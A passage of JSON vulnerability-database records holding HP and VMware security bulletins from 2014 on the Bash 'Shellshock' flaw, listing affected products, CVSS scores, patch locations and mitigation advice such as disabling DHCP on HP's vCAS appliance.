2009&#41;\r\nHP ThinPro 1.5 &#40;released 2009&#41;\r\nHP ThinPro 1.0 &#40;released 2008&#41;\r\n\r\nHP Smart Zero Core\r\n\r\nHP Smart Zero Core 5.0 &#40;released June 2014&#41;\r\nHP Smart Zero Core 4.4 &#40;released November 2013&#41;\r\nHP Smart Zero Core 4.3 &#40;released June 2013&#41;\r\nHP Smart Zero Core 4.2 &#40;released November 2012&#41;\r\nHP Smart Zero Core 4.1 &#40;released March 2012&#41;\r\nHP Smart Zero Core 4.0 &#40;released March 2011&#41;\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10\r\nCVE-2014-7169 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has released the following software updates to resolve the vulnerability.\r\n\r\nProduct Affected\r\n Product Versions\r\n Patch Status\r\n\r\nHP ThinPro and HP Smart Zero Core &#40;X86&#41;\r\n v5.1.0 and above\r\n No update required; the Bash shell patch is incorporated into the base\r\nimage.\r\nIf you participated in the ThinPro 5.1.0 beta program upgrade to the release\r\nversion as soon as it becomes available.\r\n\r\nHP ThinPro and HP Smart Zero Core &#40;x86&#41;\r\n v5.0.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86.xar .\r\nThe update can be also downloaded directly from ftp://ftp.hp.com/pub/tcdebian\r\n/updates/5.0/service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86\r\n.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core &#40;x86&#41;\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core &#40;ARM&#41;\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core\r\n v4.3x and earlier\r\n An update will be made available for customers upon request\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 03 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlQuzswACgkQ4B86/C0qfVlEmwCeKmjiIhep4sXipKg6EBSF8f5L\r\nmYcAnRPAcBRS9bs0c+WaszC9E7lEhSC/\r\n=dPt5\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-05T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31125", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31125", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04468293\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04468293\r\nVersion: 2\r\n\r\nHPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-10-01\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP DreamColor\r\nZ27x Professional Display running Bash Shell . This is the Bash Shell\r\nvulnerability known as &quot;ShellShock&quot; which could be exploited remotely to\r\nallow execution of code.\r\n\r\nNOTE: Only the HP DreamColor Z27x model is vulnerable.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101725\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP DreamColor Z27x\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\nCVE-2014-7169 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP DreamColor Z27x Professional Display. The display provides\r\ncalibration and remote management functionality running on embedded Linux,\r\nwhich includes a bash shell. The shell is not accessible via the standard\r\ncalibration or remote management interfaces.\r\n\r\nThis bulletin will be revised when the firmware update is released.\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 30 September 2014 Initial release\r\nVersion:2 &#40;rev.2&#41; - 1 October 2014 Clarified Resolution\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlQsiJAACgkQ4B86/C0qfVkNaACguv7uwEW8LXyHRpAZ7rsOihoS\r\nmTcAn1o+pVwNz5a5E5FKWg/w0fJHt0Sx\r\n=6l1G\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-05T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31130", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31130", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471532\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471532\r\nVersion: 1\r\n\r\nHPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-09\r\nLast Updated: 2014-10-09\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreAll\r\nOperating System Software running Bash Shell. This is the Bash Shell\r\nvulnerability known as &quot;Shellshock&quot; which could be exploited remotely to\r\nallow execution of code.\r\n\r\nReferences:\r\n\r\n CVE-2014-6271\r\n\r\n CVE-2014-7169\r\n\r\n SSRT101717\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreAll Operating System Software v6.5.3 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\nCVE-2014-7169 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve the\r\nvulnerability with HP StoreAll Operating System Software running Bash Shell.\r\n\r\n - HP StoreAll OS v6.5.5\r\n\r\n - HP StoreAll OS v6.3.4\r\n\r\n Note: HP StoreAll OS v6.3.4 will be available soon. This security\r\nbulletin will be revised when it is available.\r\n\r\n To request an upgrade or installation:\r\n\r\n 1. Go to: http://www.hp.com/support/storeallsoftware\r\n\r\n 2. Under Download Index, select Software, then select Obtain software.\r\n\r\n 3. Complete the software registration form, and the HP StoreAll\r\nadministrator will contact you for the next steps.\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 9 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlQ3EYoACgkQ4B86/C0qfVlGiwCg5w4oGFIiHcG0BQW5u4uoPxef\r\nzhMAoNKjX1w2l4V/RvE12LAfaB6he8Ak\r\n=V6d1\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell, Remote Code Execution", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-13T00:00:00", "id": "SECURITYVULNS:DOC:31150", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31150", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04467807\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04467807\r\nVersion: 1\r\n\r\nHPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System\r\n&#40;vCAS&#41; running Bash Shell, Remote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-09-30\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Remote Device\r\nAccess: Virtual Customer Access System &#40;vCAS&#41; running Bash Shell . This is\r\nthe Bash Shell vulnerability known as &quot;ShellShock&quot; which could be exploited\r\nremotely to allow execution of code.\r\n\r\n NOTE: The vCAS product is vulnerable only if DHCP is enabled.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101724\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nvCAS version 14.06 &#40;RDA 8.1&#41;\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\nCVE-2014-7169 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP Remote Device Access: Virtual Customer Access System &#40;vCAS&#41;\r\nrunning Bash Shell. This bulletin will be revised when the software update is\r\nreleased.\r\n\r\nNOTE: HP recommends to not power-down or disconnect the vCAS until the update\r\nis available.\r\n\r\nMITIGATION INFORMATION\r\n\r\nA Shellshock attack requires the definition of an environment variable\r\nintroduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd\r\nweb server, and the DHCP client.\r\n\r\n - The exploit does not elevate privileges.\r\n - The SSH and webserver exploits require vCAS credentials so there is no\r\nrisk for unauthorized access or code execution through this vulnerability.\r\n\r\nThe DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP\r\nexploit can be mitigated by ensuring that DHCP is disabled on the vCAS.\r\n\r\n Note: HP strongly discourages the use of DHCP on the vCAS.\r\n\r\nThe web UI forces the vCAS user to assign a static IP address and change the\r\nhp-admin password. A vCAS user must manually configure DHCP for use on the\r\nvCAS.\r\n\r\nA vCAS user can verify that DHCP is disabled by inspecting the file\r\n&quot;/etc/network/interfaces&quot; and ensuring that the &quot;iface&quot; line for device\r\n&quot;eth0&quot; is set for a static IP.\r\n\r\n Example of a static IP configuration:\r\n\r\n # The primary network interface\r\n auto eth0\r\n iface eth0 inet static\r\n address 172.27.1.68\r\n netmask 255.255.255.0\r\n gateway 172.27.1.1\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 30 September 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlQrBP4ACgkQ4B86/C0qfVmXyQCfcKhAA0uY3dImfSwtEVk8Za3c\r\nvj4AnjNi4SmLcQFrPcGjdzRDt8U1OGS/\r\n=6Tia\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-05T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System &#40;vCAS&#41; running Bash Shell, Remote Code Execution", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31135", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31135", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nVMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2014-0010\r\nSynopsis: VMware product updates address critical Bash \r\n security vulnerabilities\r\nIssue date: 2014-09-30\r\nUpdated on: 2014-09-30 &#40;Initial Advisory&#41;\r\nCVE numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, \r\n CVE-2014-7187\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware product updates address Bash security vulnerabilities.\r\n\r\n2. Relevant Releases &#40;Affected products for which remediation is present&#41;\r\n\r\n vCenter Log Insight 2.0\r\n\r\n3. Problem Description \r\n\r\n a. Bash update for multiple products.\r\n\r\n Bash libraries have been updated in multiple products to resolve \r\n multiple critical security issues, also referred to as Shellshock.\r\n \r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n has assigned the identifiers CVE-2014-6271, CVE-2014-7169, \r\n CVE-2014-7186, and CVE-2014-7187 to these issues.\r\n\r\n VMware products have been grouped into the following four\r\n product categories:\r\n \r\n I&#41; ESXi and ESX Hypervisor\r\n ESXi is not affected because ESXi uses the Ash shell &#40;through\r\n busybox&#41;, which is not affected by the vulnerability reported\r\n for the Bash shell.\r\n ESX has an affected version of the Bash shell. See table 1 for\r\n remediation for ESX.\r\n \r\n II&#41; Windows-based products\r\n Windows-based products, including all versions of vCenter Server \r\n running on Windows, are not affected.\r\n\r\n III&#41; VMware &#40;virtual&#41; appliances\r\n VMware &#40;virtual&#41; appliances ship with an affected version of Bash. \r\n See table 2 for remediation for appliances.\r\n \r\n IV&#41; Products that run on Linux, Android, OSX or iOS &#40;excluding\r\nvirtual\r\n appliances&#41;\r\n\r\n Products that run on Linux, Android, OSX or iOS &#40;excluding \r\n virtual appliances&#41; might use the Bash shell that is part of the\r\n operating system. If the operating system has a vulnerable\r\n version of Bash, the Bash security vulnerability might be\r\n exploited through the product. VMware recommends that customers\r\n contact their operating system vendor for a patch. \r\n \r\n MITIGATIONS\r\n\r\n VMware encourages restricting access to appliances through\r\n firewall rules and other network layer controls to only trusted IP\r\n addresses. This measure will greatly reduce any risk to these\r\n appliances.\r\n\r\n RECOMMENDATIONS\r\n\r\n VMware recommends customers evaluate and deploy patches for\r\n affected products in Table 1 and 2 below as these\r\n patches become available. \r\n\r\n Column 4 of the following tables lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n Table 1 - ESXi and ESX Hypervisor\r\n =================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n ESXi any ESXi Not affected\r\n\r\n ESX 4.1 ESX Patch pending *\r\n\r\n ESX 4.0 ESX Patch pending *\r\n\r\n * VMware will make VMware ESX 4.0 and 4.1 security patches available \r\n for the Bash shell vulnerability. This security patch release is an \r\n exception to the existing VMware lifecycle policy. \r\n\r\n Table 2 - Products that are shipped as a &#40;virtual&#41; appliance. \r\n =============================================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n \r\n vCenter Server Appliance 5.x Linux Patch Pending\r\n Horizon DaaS Platform 6.x Linux Patch Pending\r\n Horizon Workspace 1.x, 2.x Linux Patch Pending\r\n IT Business Management Suite 1.x Linux Patch Pending\r\n NSX for Multi-Hypervisor 4.x Linux Patch Pending\r\n NSX for vSphere 6.x Linux Patch Pending\r\n NVP 3.x Linux Patch Pending\r\n vCenter Converter Standalone 5.x Linux Patch Pending \r\n vCenter Hyperic Server 5.x Linux Patch Pending\r\n vCenter Infrastructure Navigator 5.x Linux Patch Pending\r\n vCenter Log Insight 1.x, 2.x Linux 2.0 U1\r\n vCenter Operations Manager 5.x Linux Patch Pending\r\n vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending\r\n vCenter Site Recovery Manager 5.x Linux Patch Pending\r\n**\r\n vCenter Support Assistant 5.x Linux Patch Pending\r\n vCloud Automation Center 6.x Linux Patch Pending\r\n vCloud Automation Center\r\n Application Services 6.x Linux Patch Pending\r\n vCloud Director Appliance 5.x Linux Patch Pending\r\n vCloud Connector 2.x Linux Patch Pending\r\n vCloud Networking and Security 5.x Linux Patch Pending\r\n vCloud Usage Meter 3.x Linux Patch Pending\r\n vFabric Application Director 5.x, 6.x Linux Patch Pending\r\n vFabric Postgres 9.x Linux Patch Pending\r\n Viewplanner 3.x Linux Patch Pending\r\n VMware Application Dependency \r\n Planner x.x Linux Patch Pending\r\n VMware Data Recovery 2.x Linux Patch Pending\r\n VMware HealthAnalyzer 5.x Linux Patch Pending\r\n VMware Mirage Gateway 5.x Linux Patch Pending\r\n VMware Socialcast On Premise x.x Linux Patch Pending\r\n VMware Studio 2.x Linux Patch Pending\r\n VMware TAM Data Manager x.x Linux Patch Pending\r\n VMware Workbench 3.x Linux Patch Pending\r\n vSphere App HA 1.x Linux Patch Pending\r\n vSphere Big Data Extensions 1.x, 2.x Linux Patch Pending\r\n vSphere Data Protection 5.x Linux Patch Pending\r\n vSphere Management Assistant 5.x Linux Patch Pending\r\n vSphere Replication 5.x Linux Patch Pending\r\n vSphere Storage Appliance 5.x Linux Patch Pending\r\n\r\n ** This product includes Virtual Appliances that will be updated, the\r\nproduct \r\n itself is not a Virtual Appliance.\r\n\r\n 4. Solution\r\n\r\n vCenter Log Insight\r\n ----------------------------\r\n Downloads:\r\n https://www.vmware.com/go/download-vcenter-log-insight\r\n &#40;click Go to Downloads&#41;\r\n Documentation:\r\n http://kb.vmware.com/kb/2091065\r\n\r\n5. References\r\n \r\n VMware Knowledge Base Article 2090740\r\n http://kb.vmware.com/kb/2090740\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 , \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n6. Change Log\r\n\r\n 2014-09-30 VMSA-2014-0010\r\n Initial security advisory in conjunction with the release of\r\n vCenter Log Insight 2.0 U1 on 2014-09-30.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n \r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n security-announce at lists.vmware.com\r\n bugtraq at securityfocus.com\r\n fulldisclosure at seclists.org\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware Security Response Policy\r\n https://www.vmware.com/support/policies/security_response.html\r\n\r\n VMware Lifecycle Policy\r\n https://www.vmware.com/support/policies/lifecycle.html\r\n \r\n Twitter\r\n https://twitter.com/VMwareSRC\r\n\r\n Copyright 2014 VMware Inc. All rights 